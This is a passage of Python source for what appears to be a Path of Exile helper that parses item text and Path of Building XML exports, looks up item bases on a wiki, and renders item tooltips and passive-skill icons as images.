cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
for element in stat.text.keys():
d.text(cur.pos, f" {stat.text[element]}", fill=ELE_COLOR[element], font=self.font)
cur.move_x(self.font.getsize(f" {stat.text[element]}")[0])
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
elif stat.title == "Requires":
text = stat.title
for attr in stat.text.keys():
text += f" {attr.title()} {stat.text[attr]}" \
f"{'' if list(stat.text.keys())[-1] == attr else ','}"
cur.move_y(0 if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
for attr in stat.text.keys():
if attr == 'level':
d.text(cur.pos, f" {attr.title()}", fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(f" {attr.title()}")[0])
attribute_final = f" {stat.text[attr]}" \
f"{'' if list(stat.text.keys())[-1] == attr else ','}"
d.text(cur.pos, attribute_final, font=self.font)
else:
d.text(cur.pos, f" {stat.text[attr]}", font=self.font)
cur.move_x(self.font.getsize(f" {stat.text[attr]}")[0])
attribute_final = f" {attr.title()}{'' if list(stat.text.keys())[-1] == attr else ','}"
d.text(cur.pos, attribute_final, font=self.font, fill=DESC_COLOR)
cur.move_x(self.font.getsize(attribute_final)[0])
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
elif stat.title == "Lore" or stat.title == "Reminder":
if type(stat.text) is list:
for line in stat.text:
text = line
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, text, fill=stat.color, font=self.lore_font)
cur.move_y(self.lore_font.getsize(text)[1])
cur.reset_x()
self.last_action = ""
else:
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
d.text(cur.pos, stat.text, fill=stat.color, font=self.lore_font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
elif stat.title == "Image" and not isinstance(poe_item, PassiveSkill):
cur.move_x((stat.text.size[0] // 2) * -1)
cur.move_y(4)
ic = stat.text
if not isinstance(poe_item, Gem) and 'shaper' in poe_item.influences:
ic = Image.alpha_composite(self.shaper_backgrounds[poe_item.size].resize(ic.size), ic)
if not isinstance(poe_item, Gem) and 'elder' in poe_item.influences:
ic = Image.alpha_composite(self.elder_backgrounds[poe_item.size].resize(ic.size), ic)
item.alpha_composite(ic, cur.pos)
cur.move_y(stat.text.size[1])
cur.reset_x()
elif stat.title == "Image" and isinstance(poe_item, PassiveSkill):
ic = stat.text
if poe_item.asc_class:
frame = self.ascendancy_frame
elif poe_item.is_keystone:
frame = self.keystone_frame
elif poe_item.is_notable:
frame = self.notable_frame
else:
frame = self.passive_frame
icl = round(math.sqrt((frame.size[0] ** 2) / 2))
old_s = ic.size[0]
ic = ic.resize((icl, icl))
cur.move_x((ic.size[0] // 2) * -1)
cur.move_y(30)
item.alpha_composite(ic, cur.pos)
cur.move_y(((old_s + 26 - ic.size[0]) // 2) * -1)
cur.reset_x()
cur.move_x((frame.size[0] // 2) * -1)
item.alpha_composite(frame, cur.pos)
cur.move_y(frame.size[1])
cur.reset_x()
elif stat.title == "Stored Uses":
text = f"Can Store {stat.text} Use(s)"
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, "Can Store ", fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize("Can Store ")[0])
d.text(cur.pos, stat.text + " ", font=self.font)
cur.move_x(self.font.getsize(stat.text + " ")[0])
d.text(cur.pos, "Use(s)", fill=DESC_COLOR, font=self.font)
cur.reset_x()
elif stat.title == "Gem Help":
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
d.text(cur.pos, stat.text, fill=DESC_COLOR, font=self.lore_font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
elif stat.title == "Seal Cost: ":
coin = Image.open(f'{_dir}//silver_coin.png').convert('RGBA')
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.title)[0] // 2) * -1)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_y(STAT_HEIGHT + STAT_SPACING)
cur.reset_x()
sealtext = f"{stat.text}X Silver Coin"
cur.move_x((self.font.getsize(sealtext)[0] // 2) * -1)
d.text(cur.pos, f"{stat.text}X ", fill=NORMAL_COLOR, font=self.font)
cur.move_x(self.font.getsize(f"{stat.text}X ")[0])
item.alpha_composite(coin, cur.pos)
cur.move_x(coin.size[0] + 2)
d.text(cur.pos, "Silver Coin", fill=NORMAL_COLOR, font=self.font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
else:
text = f"{stat.title}{stat.text}"
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
if ':' in stat.title:
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
d.text(cur.pos, str(stat.text), fill=stat.color, font=self.font)
else:
if stat.title.startswith('{'):
color = CRAFTED
else:
color = stat.color
d.text(cur.pos, stat.title, fill=color, font=self.font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
item = ImageOps.expand(item, border=1, fill=fill)
return item
def parse_game_item(itemtext):
item = itemtext.split('\n')
groups = []
curr_group = []
for line in item:
if "---" in line:
groups.append(curr_group)
curr_group = []
else:
curr_group.append(line)
groups.append(curr_group)
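# `groups` now holds the clipboard text split into blocks separated by '--------' lines;
# the first block carries rarity, name and base type.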
pobitem = {'name': '', 'special': [], 'enchant': [],
'implicit': [], 'stats': [], 'quality': 0, 'type': "game"}
unmarked_blocks = 0
print(item, groups)
for group in groups:
if group[0].startswith('Rarity:'):
pobitem['rarity'] = group[0].split(' ')[1].title()
pobitem['base'] = group[len(group)-1]
if 'Superior' in pobitem['base']:
pobitem['base'] = pobitem['base'].replace('Superior ', '')
if 'Synthesised' in pobitem['base']:
# is there a special nature for Synthesised items?
# if yes: pobitem['special'].append('Synthesised Item')
pobitem['base'] = pobitem['base'].replace('Synthesised', '')
if len(group) > 2:
pobitem['name'] = group[1]
# defense
elif ( group[0].startswith('Quality') or
group[0].startswith('Map Tier:') or
group[0].startswith('Chance to Block:') or
group[0].startswith('Armour:') or
group[0].startswith('Evasion Rating:') or
group[0].startswith('Energy Shield:')):
for line in group:
if line.startswith('Quality:'):
pobitem['quality'] = line.replace('Quality: +', '').replace('% (augmented)', '')
elif ( line.startswith('Map Tier:') or
line.startswith('Item Quantity:') or
line.startswith('Item Rarity:') or
line.startswith('Monster Pack Size:') or
line.startswith('Atlas Region:')): # map stuff
pobitem['implicit'].append(line)
elif line.startswith('Quality ('): # catalysts
pobitem['implicit'].append(line)
# offense
elif group[len(group)-1].startswith('Attacks per Second:') or group[len(group)-1].startswith('Weapon Range:'):
# this filter is not trivial and not fully tested, due to large differences in weapon types and unique exceptions
# trivial solution would be to check for every weapon type in the game
pass
elif group[0].startswith('Requirements:'):
pass
elif group[0].startswith('Sockets:'):
pass
elif group[0].startswith('Item Level:'):
pass
elif group[0].startswith('Price:'):
pass
elif group[0].endswith('(enchant)'):
for line in group:
pobitem['enchant'].append(line.replace('(enchant)', ''))
elif group[0].endswith('(implicit)'):
for line in group:
pobitem['implicit'].append(line.replace('(implicit)', ''))
elif group[0].startswith('Corrupted'):
# should corrupted be an explicit?
pobitem['stats'].append('Corrupted')
elif group[0].endswith(' Item'):
for line in group:
pobitem['special'].append(line)
else: # unmarked blocks (e.g. "Unidentified") are treated as explicit mods
# if (groups.index(group) < len(group)-1) or len(pobitem['stats']) == 0:
if (unmarked_blocks == 0):
unmarked_blocks += 1
print("appending stats")
for line in group:
print(line)
pobitem['stats'].append(line)
else: # flavor
pass
print(pobitem)
return {
'name': pobitem['name'], 'base': pobitem['base'], 'stats': pobitem['stats'], 'rarity': pobitem['rarity'],
'implicits': pobitem['implicit'], 'quality': pobitem['quality'], 'special': pobitem['special'],
'enchant': pobitem['enchant']
}
def parse_pob_item(itemtext):
if "Implicits: " not in itemtext:
print("not in")
return parse_game_item(itemtext)
item = itemtext.split('\n')
item = [line for line in item if "---" not in line]
qualtext = 0
variant = None
pobitem = {'special': [], 'enchant': "", 'type': None}
for index, line in enumerate(item):
if "{variant:" in line:
variant_now = line[line.index("t:") + 2:line.index("}")].split(',')
if variant not in variant_now:
item.pop(index)
continue
line = item[index] = line.split("}", 1)[1]
if "{range:" in line:
try:
percent = float(line[line.index("e:") + 2:line.index("}")])
except Exception:
# If the range fraction cannot be parsed, fall back to the top of the roll range
# so `percent` is always defined for the calculation below.
percent = 1.0
txt = line.split("}")[1]
matches = re_range.findall(txt)
for match in matches:
stat = match[1:-1]
if " to " in stat:
separator = stat.find(' to ', 1)
range_end = stat[separator + 4:]
else:
separator = stat.find('-', 1)
range_end = stat[separator + 1:]
range_start = stat[:separator]
if '.' in range_start or '.' in range_end:
calc_stat = float(percent * float(range_end))
else:
calc_stat = int(percent * float(range_end))
txt = txt.replace(match, str(calc_stat))
item[index] = txt
if line.startswith("Rarity"):
pobitem['rarity'] = line.split(' ')[1].title()
pobitem['rarity_index'] = index
continue
elif line.startswith("Selected Variant"):
variant = line.split(": ")[1]
continue
# elif line.startswith("Item Level"):
# pobitem['type'] = "game"
# if item[index + 3].startswith('--'):
# offset = 2
# if "(implicit)" not in item[index + offset]:
# pobitem['enchant'] = item[index + offset]
# offset = 4
# if "(implicit)" in item[index + offset]:
# pobitem['implicits'] = 0
# for line_inner in item[index + offset:]:
# print(line_inner)
# if "(implicit)" in line_inner:
# pobitem['implicits'] = pobitem['implicits'] + 1
# if "---" in line_inner:
# break
# pobitem['statstart_index'] = index + offset + pobitem['implicits']
# else:
# pobitem['statstart_index'] = index + offset
# else:
# pobitem['statstart_index'] = index + 2
elif line.startswith("====="):
pobitem['statstart_index'] = index
elif line.startswith("Implicits:") and 'implicits' not in pobitem:
pobitem['type'] = 'pob'
pobitem['implicits'] = int(line.split(': ')[1])
pobitem['statstart_index'] = index + pobitem['implicits']
elif "(enchant)" in line or "(implicit)" in line:
if 'implicits' not in pobitem:
pobitem['implicits'] = 1
else:
pobitem['implicits'] = pobitem['implicits'] + 1
pobitem['statstart_index'] = index
elif line.startswith("Requires"):
pobitem['statstart_index'] = index
elif line.startswith("Quality"):
try:
qualtext = line.split("+")[1].split(' ')[0].strip('%')
except IndexError:
pass
if "Shaper Item" in line:
pobitem['special'].append("Shaper Item")
if "Elder Item" in line:
pobitem['special'].append("Elder Item")
if "Crusader Item" in line:
pobitem['special'].append("Crusader Item")
if "Redeemer Item" in line:
pobitem['special'].append("Redeemer Item")
if "Warlord Item" in line:
pobitem['special'].append("Warlord Item")
if "Hunter Item" in line:
pobitem['special'].append("Hunter Item")
if pobitem['rarity'].lower() in ['unique', 'rare', 'relic']:
name = item[pobitem['rarity_index'] + 1]
base = item[pobitem['rarity_index'] + 2]
elif pobitem['rarity'].lower() == 'magic':
name = item[pobitem['rarity_index'] + 1]
if "Superior" in name:
name = name.replace("Superior", "").strip()
base = get_base_from_magic(name)
else:
name = item[pobitem['rarity_index'] + 1]
if "Superior" in name:
name = name.replace("Superior", "").strip()
base = name
if 'implicits' in pobitem and pobitem['implicits']:
if pobitem['type'] == 'game':
offset = 0
else:
offset = 1
implicits = item[:pobitem['statstart_index'] + offset][-1 * pobitem['implicits']:]
implicits = [implicit.replace('(implicit)', '') for implicit in implicits]
elif item[pobitem['statstart_index'] - 2].startswith('--') and 'Item Level' not in item[pobitem['statstart_index'] - 1]:
imp_end = "None"
for ind, stat in enumerate(item[pobitem['statstart_index'] - 1:]):
if stat.startswith('--'):
if item[pobitem['statstart_index'] - 1:][ind + 1] not in ['Shaper Item', 'Elder Item']:
imp_end = ind - 1
break
if imp_end != "None":
implicits = item[pobitem['statstart_index'] - 1:][0:imp_end]
else:
implicits = []
else:
implicits = []
stat_text = item[pobitem['statstart_index'] + 1:]
stat_text = [stat for stat in stat_text if not stat.startswith('--')
and not ":" in stat and stat]
if '(' in base and ')' in base:
base = base[:base.find('(') - 1]
if "Synthesised" in base:
base = base.replace("Synthesised", "").strip()
if "Synthesised" in name:
name = name.replace("Synthesised", "").strip()
print(implicits, stat_text)
return {
'name': name, 'base': base, 'stats': stat_text, 'rarity': pobitem['rarity'],
'implicits': implicits, 'quality': int(qualtext), 'special': pobitem['special'],
'enchant': pobitem['enchant']
}
def ensure_rangeless(stat):
if "-" in str(stat):
return stat.split('-')[0][1:]
return stat
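# Illustrative behaviour of ensure_rangeless (hypothetical inputs, not from the source):
#   ensure_rangeless("(10-20)")  -> "10"   # takes the low end of a "(low-high)" roll
#   ensure_rangeless(42)         -> 42     # values without a dash pass through unchanged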
def modify_base_stats(item):
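    '''
    Fold quality plus local implicit/explicit modifiers (flat/increased defences,
    added damage, attack speed, crit chance, weapon range and block) into the
    base stats of the given wiki item object, mutating it in place.
    '''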
stats = {
'flat es': 0, 'flat armour': 0, 'flat evasion': 0, 'inc es': int(item.quality),
'inc armour': int(item.quality), 'inc evasion': int(item.quality), 'aspd': 0,
'fire low': 0, 'fire max': 0, 'fire inc': 0, 'cold low': 0, 'cold max': 0,
'cold inc': 0, 'light low': 0, 'light max': 0, 'light inc': 0, 'chaos low': 0,
'chaos max': 0, 'chaos inc': 0, 'phys low': 0, 'phys max': 0, 'phys inc': int(item.quality),
'cc': 0, 'range': 0, 'block': 0
}
if item.implicits:
for stat in unescape_to_list(item.implicits):
text = stat.lower().replace('{crafted}', '').replace('{fractured}', '')
if not any(c.isdigit() for c in text) or 'minion' in text or 'global' in text:
continue
if ' per ' in text or ' if ' in text or ',' in text:
continue
if " to " in text and "multiplier" not in text and ":" not in text:
if 'armour' in text and isinstance(item, Armour):
stats['flat armour'] += int(text.split(' ')[0][1:])
elif 'evasion rating' in text and isinstance(item, Armour):
stats['flat evasion'] += int(text.split(' ')[0][1:])
elif 'maximum energy shield' in text and isinstance(item, Armour):
stats['flat es'] += int(text.split(' ')[0][1:])
elif 'weapon range' in text and isinstance(item, Weapon):
stats['range'] += int(text.split(' ')[0][1:])
elif 'block' in text and 'spell damage' not in text and 'block recovery' not in text and \
"maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "damage" in text and "reflect" not in text and "converted" not in text and isinstance(item, Weapon):
k = None
if 'lightning' in text:
k = 'light'
if 'cold' in text:
k = 'cold'
if 'fire' in text:
k = 'fire'
if 'chaos' in text:
k = 'chaos'
if 'physical' in text:
k = 'phys'
if k:
stats[f'{k} low'] += int(text.split(' to ')[0].split(' ')[-1])
stats[f'{k} max'] += int(text.split(' to ')[1].split(' ')[0])
elif " increased " in text:
if "armour" in text and isinstance(item, Armour):
stats['inc armour'] += int(text.split(' ')[0][:-1])
if "evasion rating" in text and isinstance(item, Armour):
stats['inc evasion'] += int(text.split(' ')[0][:-1])
if "energy shield" in text and isinstance(item, Armour):
stats['inc es'] += int(text.split(' ')[0][:-1])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text and \
"maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "attack speed" in text and isinstance(item, Weapon):
stats['aspd'] += int(text.split(' ')[0][:-1])
if "critical strike chance" in text and isinstance(item, Weapon):
stats['cc'] += int(text.split(' ')[0][:-1])
if "damage" in text and isinstance(item, Weapon):
if 'lightning' in text:
stats['light inc'] += int(text.split(' ')[0][:-1])
if 'cold' in text:
stats['cold inc'] += int(text.split(' ')[0][:-1])
if 'fire' in text:
stats['fire inc'] += int(text.split(' ')[0][:-1])
if 'chaos' in text:
stats['chaos inc'] += int(text.split(' ')[0][:-1])
if 'physical' in text:
stats['phys inc'] += int(text.split(' ')[0][:-1])
if item.explicits:
for stat in unescape_to_list(item.explicits):
text = stat.lower().replace('{crafted}', '').replace('{fractured}', '')
if not any(c.isdigit() for c in text) or 'minion' in text or 'global' in text:
continue
if ' per ' in text or ' if ' in text or ',' in text:
continue
if " to " in text and "multiplier" not in text and ":" not in text:
if 'armour' in text and isinstance(item, Armour):
stats['flat armour'] += int(text.split(' ')[0][1:])
elif 'evasion rating' in text and isinstance(item, Armour):
stats['flat evasion'] += int(text.split(' ')[0][1:])
elif 'maximum energy shield' in text and isinstance(item, Armour):
stats['flat es'] += int(text.split(' ')[0][1:])
elif 'weapon range' in text and isinstance(item, Weapon):
stats['range'] += int(text.split(' ')[0][1:])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text \
and "maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "damage" in text and "reflect" not in text and "converted" not in text and isinstance(item, Weapon):
k = None
if 'lightning' in text:
k = 'light'
if 'cold' in text:
k = 'cold'
if 'fire' in text:
k = 'fire'
if 'chaos' in text:
k = 'chaos'
if 'physical' in text:
k = 'phys'
if k:
stats[f'{k} low'] += int(text.split(' to ')[0].split(' ')[-1])
stats[f'{k} max'] += int(text.split(' to ')[1].split(' ')[0])
elif " increased " in text:
if "armour" in text and isinstance(item, Armour):
stats['inc armour'] += int(text.split(' ')[0][:-1])
if "evasion rating" in text and isinstance(item, Armour):
stats['inc evasion'] += int(text.split(' ')[0][:-1])
if "energy shield" in text and isinstance(item, Armour):
stats['inc es'] += int(text.split(' ')[0][:-1])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "attack speed" in text and isinstance(item, Weapon):
stats['aspd'] += int(text.split(' ')[0][:-1])
if "critical strike chance" in text and isinstance(item, Weapon):
stats['cc'] += int(text.split(' ')[0][:-1])
if "damage" in text and isinstance(item, Weapon):
if 'lightning' in text:
stats['light inc'] += int(text.split(' ')[0][:-1])
if 'cold' in text:
stats['cold inc'] += int(text.split(' ')[0][:-1])
if 'fire' in text:
stats['fire inc'] += int(text.split(' ')[0][:-1])
if 'chaos' in text:
stats['chaos inc'] += int(text.split(' ')[0][:-1])
if 'physical' in text:
stats['phys inc'] += int(text.split(' ')[0][:-1])
if 'weapon' in item.tags:
if stats['aspd']:
_as = float(ensure_rangeless(item.attack_speed))
item.attack_speed = f"{(_as + (stats['aspd'] / 100) * _as):.2}"
if stats['cc']:
cc = 5.0
cc += cc * (stats['cc'] / 100)
item.critical_chance = f"{cc:.2}%"
if stats['range']:
i_range = int(ensure_rangeless(item.range))
i_range += stats['range']
item.range = f"{i_range}"
if stats['fire max'] or stats['fire inc']:
if stats['fire max']:
item.fire_min = stats['fire low']
item.fire_max = stats['fire max']
fire_m = int(ensure_rangeless(item.fire_min))
fire_mx = int(ensure_rangeless(item.fire_max))
fire_m += fire_m * (stats['fire inc'] / 100)
fire_mx += fire_mx * (stats['fire inc'] / 100)
item.fire_min = str(round(fire_m))
item.fire_max = str(round(fire_mx))
if stats['cold max'] or stats['cold inc']:
if stats['cold max']:
item.cold_min = stats['cold low']
item.cold_max = stats['cold max']
cold_m = int(ensure_rangeless(item.cold_min))
cold_mx = int(ensure_rangeless(item.cold_max))
cold_m += cold_m * (stats['cold inc'] / 100)
cold_mx += cold_mx * (stats['cold inc'] / 100)
item.cold_min = str(round(cold_m))
item.cold_max = str(round(cold_mx))
if stats['light max'] or stats['light inc']:
if stats['light max']:
item.lightning_min = stats['light low']
item.lightning_max = stats['light max']
lightning_m = int(ensure_rangeless(item.lightning_min))
lightning_mx = int(ensure_rangeless(item.lightning_max))
lightning_m += lightning_m * (stats['light inc'] / 100)
lightning_mx += lightning_mx * (stats['light inc'] / 100)
item.lightning_min = str(round(lightning_m))
item.lightning_max = str(round(lightning_mx))
if stats['chaos max'] or stats['chaos inc']:
if stats['chaos max']:
item.chaos_min = stats['chaos low']
item.chaos_max = stats['chaos max']
chaos_m = int(ensure_rangeless(item.chaos_min))
chaos_mx = int(ensure_rangeless(item.chaos_max))
chaos_m += chaos_m * (stats['chaos inc'] / 100)
chaos_mx += chaos_mx * (stats['chaos inc'] / 100)
item.chaos_min = str(round(chaos_m))
item.chaos_max = str(round(chaos_mx))
if stats['phys max'] or stats['phys inc']:
physical_m = int(ensure_rangeless(item.physical_min)) + stats['phys low']
physical_mx = int(ensure_rangeless(item.physical_max)) + stats['phys max']
physical_m += physical_m * (stats['phys inc'] / 100)
physical_mx += physical_mx * (stats['phys inc'] / 100)
item.physical_min = str(round(physical_m))
item.physical_max = str(round(physical_mx))
else:
try:
if item.armour:
arm = int(ensure_rangeless(item.armour))
arm += stats['flat armour']
arm += (stats['inc armour'] / 100) * arm
item.armour = str(round(arm))
except Exception:
return
if item.evasion:
ev = int(ensure_rangeless(item.evasion))
ev += stats['flat evasion']
ev += (stats['inc evasion'] / 100) * ev
item.evasion = str(round(ev))
if item.energy_shield:
es = int(ensure_rangeless(item.energy_shield))
es += stats['flat es']
es += (stats['inc es'] / 100) * es
item.energy_shield = str(round(es))
if "shield" in item.tags:
block = int(ensure_rangeless(item.block))
block += stats['block']
item.block = str(round(block))
def _get_wiki_base(item, object_dict, cl, slot, char_api=False, thread_exc_queue=None):
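    '''
    Resolve the parsed item against the wiki client `cl`, copy its mods, quality
    and influences onto the looked-up base object and store the result in
    object_dict[slot]. Intended to run in a worker thread; lookup failures are
    pushed onto thread_exc_queue when one is provided.
    '''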
try:
assert item['rarity'].lower()
except Exception:
pass
if item['rarity'].lower() in ['unique', 'relic'] and char_api:
try:
wiki_base = cl.find_items({'name': item['name']})[0]
except IndexError:
ex = AbsentItemBaseException(f"Could not find {item['name']}")
if thread_exc_queue:
thread_exc_queue.put(ex)
return
if not wiki_base:
pass
if isinstance(wiki_base, Weapon):
wiki_base.attack_speed = item.get('attack_speed', 0)
wiki_base.chaos_min = item.get('chaos_min', 0)
wiki_base.chaos_max = item.get('chaos_max', 0)
wiki_base.cold_min = item.get('cold_min', 0)
wiki_base.cold_max = item.get('cold_max', 0)
wiki_base.fire_min = item.get('fire_min', 0)
wiki_base.fire_max = item.get('fire_max', 0)
wiki_base.lightning_min = item.get('lightning_min', 0)
wiki_base.lightning_max = item.get('lightning_max', 0)
wiki_base.physical_min = item.get('physical_min', 0)
wiki_base.physical_max = item.get('physical_max', 0)
wiki_base.range = item.get('range', 0)
wiki_base.critical_chance = item.get('critical_chance', 0)
elif isinstance(wiki_base, Armour):
wiki_base.armour = item.get('armour', 0)
wiki_base.evasion = item.get('evasion', 0)
wiki_base.energy_shield = item.get('energy_shield', 0)
if item['rarity'].lower() == 'relic':
wiki_base.rarity = 'relic'
elif item['rarity'].lower() in ['unique', 'relic']:
real_base = cl.find_items({'name': item['base']})[0]
try:
wiki_base = cl.find_items({'name': item['name']})[0]
except IndexError:
wiki_base = real_base
wiki_base.implicits = item['implicits']
wiki_base.explicits = item['stats']
wiki_base.name = item['name']
wiki_base.base = item['base']
wiki_base.rarity = item['rarity']
if isinstance(wiki_base, Weapon):
wiki_base.attack_speed = real_base.attack_speed
wiki_base.chaos_min = real_base.chaos_min
wiki_base.chaos_max = real_base.chaos_max
wiki_base.cold_min = real_base.cold_min
wiki_base.cold_max = real_base.cold_max
wiki_base.fire_min = real_base.fire_min
wiki_base.fire_max = real_base.fire_max
wiki_base.lightning_min = real_base.lightning_min
wiki_base.lightning_max = real_base.lightning_max
if real_base.physical_min > wiki_base.physical_min:
wiki_base.physical_min = real_base.physical_min
if real_base.physical_max > wiki_base.physical_max:
wiki_base.physical_max = real_base.physical_max
wiki_base.range = real_base.range
wiki_base.critical_chance = real_base.critical_chance
elif isinstance(wiki_base, Armour):
wiki_base.armour = real_base.armour
wiki_base.evasion = real_base.evasion
wiki_base.energy_shield = real_base.energy_shield
if item['rarity'].lower() == 'relic':
wiki_base.rarity = 'relic'
elif "Flask" in item['base']:
return
else:
if item['rarity'].lower() == 'magic' and item['name'] == item['base']:
if '' in item['stats']:
item['stats'].remove('')
item['base'] = get_base_from_magic(item['base'])
wl = []
for w in item['base'].split(' '):
if not any(char.isdigit() for char in w):
wl.append(w)
try:
wiki_base = cl.find_items({'name': ' '.join(wl).replace("Synthesised", "").strip()})[0]
except IndexError:
ex = AbsentItemBaseException(f"Could not find {item['name']}")
if thread_exc_queue:
thread_exc_queue.put(ex)
return
wiki_base.rarity = item['rarity']
wiki_base.name = item['name']
wiki_base.base = item['base']
if char_api:
if item['implicits']:
wiki_base.implicits = '<br>'.join(item['implicits'])
if item['explicits']:
wiki_base.explicits = '<br>'.join(item['explicits'])
else:
try:
pass
except Exception:
pass
if item['implicits']:
wiki_base.implicits = '<br>'.join(item['implicits'])
if item['stats']:
wiki_base.explicits = '<br>'.join(item['stats'])
if item['enchant']:
wiki_base.enchant = item['enchant']
wiki_base.quality = item['quality']
    if (wiki_base.rarity.lower() not in ['unique', 'relic'] and char_api) or char_api is False:
if wiki_base.quality == '' or "ring" in wiki_base.tags or "amulet" in wiki_base.tags \
or "belt" in wiki_base.tags or "quiver" in wiki_base.tags or "flask" in wiki_base.tags \
or "jewel" in wiki_base.tags:
pass
else:
modify_base_stats(wiki_base)
if item['special']:
for influence in item['special']:
if influence == "Shaper Item":
wiki_base.influences.append("shaper")
elif influence == "Elder Item":
wiki_base.influences.append("elder")
elif influence == "Redeemer Item":
wiki_base.influences.append("redeemer")
elif influence == "Crusader Item":
wiki_base.influences.append("crusader")
elif influence == "Warlord Item":
wiki_base.influences.append("warlord")
elif influence == "Hunter Item":
wiki_base.influences.append("hunter")
object_dict[slot] = wiki_base
def parse_pob_xml(xml: str, cl=None):
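    '''
    Parse a Path of Building XML export: collect equipped items per slot
    (resolved against the wiki when `cl` is given), socketed gems, jewels, the
    active passive tree and a dict of character stats read from Build/PlayerStat
    nodes. Raises OutdatedPoBException when expected stats are missing.
    '''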
tree = Etree.ElementTree(Etree.fromstring(xml))
equipped = {}
slots = tree.findall('Items/Slot')
for slot in slots:
if 'socket' in slot.attrib['name'].lower():
continue
equipped[slot.attrib['name']] = {}
equipped[slot.attrib['name']]['id'] = slot.attrib['itemId']
if cl:
obj_dict = {}
threads = []
exc_queue = Queue()
for slot in equipped:
item_id = equipped[slot]['id']
tree_item = tree.find(f'Items/Item[@id="{item_id}"]')
if 'variant' in tree_item.attrib:
lines = tree_item.text.replace('\t', '').split('\n')
for line in lines[:]:
if line.startswith('{variant'):
variant = line.split('variant:')[1][0]
if variant != tree_item.attrib['variant']:
lines.remove(line)
tree_item.text = '\n'.join(lines)
equipped[slot]['raw'] = tree_item.text.replace('\t', '')
try:
equipped[slot]['parsed'] = parse_pob_item(equipped[slot]['raw'])
except Exception:
continue
item = equipped[slot]['parsed']
t = threading.Thread(target=_get_wiki_base, args=(item, obj_dict, cl, slot))
threads.append(t)
t.start()
for thread in threads:
thread.join()
if not exc_queue.empty():
raise exc_queue.get()
for slot in obj_dict:
equipped[slot]['object'] = obj_dict[slot]
skill_slots = tree.findall('Skills/Skill')
for skill in skill_slots:
if 'slot' in skill.attrib:
slot = skill.attrib['slot']
if slot in equipped:
equipped[slot]['gems'] = []
lst = equipped[slot]['gems']
else:
continue
else:
if 'gem_groups' not in equipped:
equipped['gem_groups'] = {}
try:
if not skill.getchildren()[0].attrib['nameSpec'] in equipped['gem_groups']:
equipped['gem_groups'][skill.getchildren()[0].attrib['nameSpec']] = []
except Exception:
continue
lst = equipped['gem_groups'][skill.getchildren()[0].attrib['nameSpec']]
gems = skill.getchildren()
for gem in gems:
gem_d = {
'name': gem.attrib['nameSpec'],
'level': gem.attrib['level'],
'enabled': gem.attrib['enabled'],
'quality': gem.attrib['quality']
}
lst.append(gem_d)
stats = {}
active_spec = int(tree.find('Tree').attrib['activeSpec']) - 1
current_tree = tree.findall('Tree/Spec')[active_spec]
tree_base64 = current_tree.find('URL').text.replace('\t', '').replace('\n', '').rsplit('/', 1)[1]
byte_tree = binascii.a2b_base64(tree_base64.replace('-', '+').replace('_', '/'))
pos = 7
total_nodes = (len(byte_tree) - 7) // 2
nodes = []
for _ in range(total_nodes):
nodes.append(str(int.from_bytes(byte_tree[pos:pos + 2], byteorder='big')))
pos += 2
stats['keystones'] = []
stats['asc_nodes'] = []
for node in nodes:
if node in keystones:
stats['keystones'].append(keystones[node])
if node in asc_nodes:
stats['asc_nodes'].append(asc_nodes[node])
stats['trees'] = {}
for spec in tree.findall('Tree/Spec'):
name = spec.attrib['title'] if 'title' in spec.attrib else 'Default'
stats['trees'][name] = spec.find('URL').text.replace('\t', '').replace('\n', '').replace('/passive', '/fullscreen-passive')
stats['jewels'] = []
jewel_sockets = current_tree.findall('Sockets/Socket')
for socket in jewel_sockets:
if socket.attrib['itemId'] != "0":
item_id = socket.attrib['itemId']
parsed = parse_pob_item(tree.find(f'Items/Item[@id="{item_id}"]').text.replace('\t', ''))
stats['jewels'].append(parsed)
stats['equipped'] = equipped
try:
stats['bandit'] = tree.find('Build').attrib['bandit']
except Exception:
stats['bandit'] = "None"
try:
stats['class'] = tree.find('Build').attrib.get('className', "None")
stats['ascendancy'] = tree.find('Build').attrib.get('ascendClassName', "None")
try:
stats['total_dps'] = tree.find('Build/PlayerStat[@stat="CombinedDPS"]').attrib['value']
except Exception:
stats['total_dps'] = tree.find('Build/PlayerStat[@stat="TotalDPS"]').attrib['value']
stats['level'] = tree.find('Build').attrib['level']
try:
main_group = int(tree.find('Build').attrib.get('mainSocketGroup', 1))
skill_in_group = int(skill_slots[main_group - 1].attrib.get('mainActiveSkill', 1))
